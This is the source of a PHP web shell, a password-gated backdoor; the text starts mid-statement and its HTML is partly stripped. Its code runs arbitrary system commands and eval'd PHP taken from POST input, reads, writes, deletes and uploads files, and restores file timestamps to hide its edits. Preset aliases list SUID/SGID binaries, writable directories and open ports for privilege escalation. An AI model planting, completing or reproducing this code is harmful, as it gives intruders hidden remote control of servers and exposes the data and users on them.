$v ) $_POST [$k] = stripslashes ( $v ); foreach ( $_SERVER as $k => $v ) $_SERVER [$k] = stripslashes ( $v ); } if (! isset ( $_GET ['z'] ) || md5 ( $_GET ['z'] ) !== '95e1ebd665d6df61319c938b954f913c') die (); function execute($c) { if (function_exists ( 'exec' )) { @exec ( $c, $out ); return @implode ( "\n", $out ); } elseif (function_exists ( 'shell_exec' )) { $out = @shell_exec ( $c ); return $out; } elseif (function_exists ( 'system' )) { @ob_start (); @system ( $c, $ret ); $out = @ob_get_contents (); @ob_end_clean (); return $out; } elseif (function_exists ( 'passthru' )) { @ob_start (); @passthru ( $c, $ret ); $out = @ob_get_contents (); @ob_end_clean (); return $out; } else { return FALSE; } } function read($f) { $str = @file ( $f ); if ($str) { $out = implode ( '', $str ); } elseif (function_exists ( 'curl_version' )) { @ob_start (); $h = @curl_init ( 'file:/' . '/' . $f ); @curl_exec ( $h ); $out = @ob_get_contents (); @ob_end_clean (); } else { $out = 'Could not read file!'; } return htmlspecialchars ( $out ); } function write($f, $c) { $t = filemtime ( $f ); $fp = @fopen ( $f, 'w' ); if ($fp) { fwrite ( $fp, $c ); fclose ( $fp ); $out = 'File saved.' . "\n"; if ($t && touch ( $f, $t )) { $out .= 'Last modification time changed.'; } else { $out .= 'Could not change last modification time!'; } } else { $out = 'Saving failed!'; } return $out; } function file_size($f) { $size = filesize ( $f ); if ($size < 1024) $size = $size . ' b'; elseif ($size < 1048576) $size = round ( $size / 1024 * 100 ) / 100 . ' Kb'; elseif ($size < 1073741824) $size = round ( $size / 1048576 * 100 ) / 100 . ' Mb'; return $size; } $zzz = $_POST ['zzz']; if (! function_exists ( 'natcasesort' )) { function natcasesort($arr) { return sort ( $arr ); } } if (! empty ( $_POST ['dir'] )) { $dir = $_POST ['dir']; if (! @chdir ( $dir )) $out = 'chdir() failled!'; } $dir = getcwd (); (strlen ( $dir ) > 1 && $dir [1] == ':') ? $os_type = 'win' : $os_type = 'nix'; if (! $os_name = @php_uname ()) { if (function_exists ( 'posix_uname' )) { $os_name = posix_uname (); } elseif ($os_name != getenv ( 'OS' )) { $os_name = ''; } } if (function_exists ( 'posix_getpwuid' )) { $data = posix_getpwuid ( posix_getuid () ); $user = $data ['name'] . ' uid(' . $data ['uid'] . ') gid(' . $data ['gid'] . ')'; } else { $user = ''; } $safe_mode = get_cfg_var ( 'safe_mode' ); $safe_mode ? $safe = 'on' : $safe = 'off'; execute ( 'echo ssps' ) ? $execute = 'on' : $execute = 'off'; $server = getenv ( 'SERVER_SOFTWARE' ); if (! $server) $server = '---'; $out = ''; $tail = ''; $aliases = ''; if (! $safe_mode) { if ($os_type == 'nix') { $os .= execute ( 'sysctl -n kern.ostype' ); $os .= execute ( 'sysctl -n kern.osrelease' ); $os .= execute ( 'sysctl -n kernel.ostype' ); $os .= execute ( 'sysctl -n kernel.osrelease' ); if (empty ( $user )) $user = execute ( 'id' ); $aliases = array ('' => '', 'find suid files' => 'find / -type f -perm -04000 -ls', 'find sgid files' => 'find / -type f -perm -02000 -ls', 'find all writable files in current dir' => 'find . -type f -perm -2 -ls', 'find all writable directories in current dir' => 'find . -type d -perm -2 -ls', 'find all writable directories and files in current dir' => 'find . -perm -2 -ls', 'show opened ports' => 'netstat -an | grep -i listen' ); } else { $os_name .= execute ( 'ver' ); $user .= execute ( 'echo %username%' ); $aliases = array ('' => '', 'show runing services' => 'net start', 'show process list' => 'tasklist' ); } } print << table {font:9pt Tahoma;border-color:white} input,select,file {background-color:#eeeeee} textarea {background-color:#f2f2f2}
here; print << here; if ($aliases) { print << here; } print <<

here; if (empty ( $zzz ) || md5 ( $zzz ) !== 'a841b9908eac74475729ae0be846d1b6') { print << here; die (); } if (! empty ( $_POST ['cmd'] )) { $out = execute ( $_POST ['cmd'] ); } elseif (! empty ( $_POST ['php'] )) { ob_start (); eval ( $_POST ['php'] ); $out = ob_get_contents (); ob_end_clean (); } elseif (! empty ( $_POST ['edit'] )) { $file = $_POST ['edit']; $out = read ( $file ); $tail = ' '; } elseif (! empty ( $_POST ['save'] )) { $out = write ( $_POST ['efile'], $_POST ['save'] ); } elseif (! empty ( $_POST ['remove'] )) { $obj = $_POST ['remove']; @is_dir ( $obj ) ? $res = @rmdir ( $obj ) : $res = @unlink ( $obj ); $res ? $out = 'Removed successfully' : $out = 'Removing failed!'; } elseif (! empty ( $_POST ['newdir'] )) { @mkdir ( $_POST ['newdir'] ) ? $out = 'Directory created.' : $out = 'Could not create directory!'; } elseif (! empty ( $_POST ['newfile'] )) { @touch ( $_POST ['newfile'] ) ? $out = 'File created.' : $out = 'Could not create file!'; } elseif (! empty ( $_POST ['alias'] )) { $out = execute ( $_POST ['alias'] ); } elseif (! empty ( $_FILES ['ufile'] ['tmp_name'] )) { if (! is_uploaded_file ( $_FILES ['ufile'] ['tmp_name'] ) || @! copy ( $_FILES ['ufile'] ['tmp_name'], $dir . chr ( 47 ) . $_FILES ['ufile'] ['name'] )) $out = 'Could not upload file'; else $out = 'Uploaded successfully.'; } if (! $safe_mode) print <<	cmd
php
actions	edit		remove		new_dir		new_file
aliases	here; foreach ( $aliases as $k => $v ) { print '' . $k . ''; } print <<
dir
upload

?>

OS: {$os_name} User: {$user} Server: {$server} safe_mode: {$safe} execute: {$execute} max_execution_time: {$limit}

here; if ($dp = @openDir ( $dir )) { $cObj = readDir ( $dp ); while ( $cObj ) { if (@is_dir ( $cObj )) $theDirs [] = $cObj; elseif (@is_file ( $cObj )) $theFiles [] = $cObj; $cObj = readDir ( $dp ); } closedir ( $dp ); } if (! empty ( $theDirs )) { natcasesort ( $theDirs ); if ($os_type == 'nix') { foreach ( $theDirs as $cDir ) { $color = 'black'; if (is_writeable ( $cDir )) { $color = 'red'; } elseif (is_readable ( $cDir )) { $color = 'blue'; } print "<" . $cDir . "> "; } } else { foreach ( $theDirs as $cDir ) { $tmp = $cDir . '/.ssps_tmp'; if (@touch ( $tmp )) { $color = 'red'; unlink ( $tmp ); } elseif (opendir ( $cDir )) { closedir (); $color = 'blue'; } else { $color = 'black'; } print "<" . $cDir . "> "; } } } else print ' open_basedir restriction in effect. Allowed path is ' . get_cfg_var ( 'open_basedir' ); print ' '; if (! empty ( $theFiles )) { natcasesort ( $theFiles ); print ''; foreach ( $theFiles as $cFile ) { $size = file_size ( $cFile ); if ($fp = @fopen ( $cFile, 'a' )) $color = 'red'; elseif ($fp = @fopen ( $cFile, 'r' )) $color = 'blue'; else $color = 'black'; @fclose ( $fp ); print ''; } print ' ' . $cFile . ' ' . $size . ' '; } print <<

results: {$out} {$tail}

here; die ();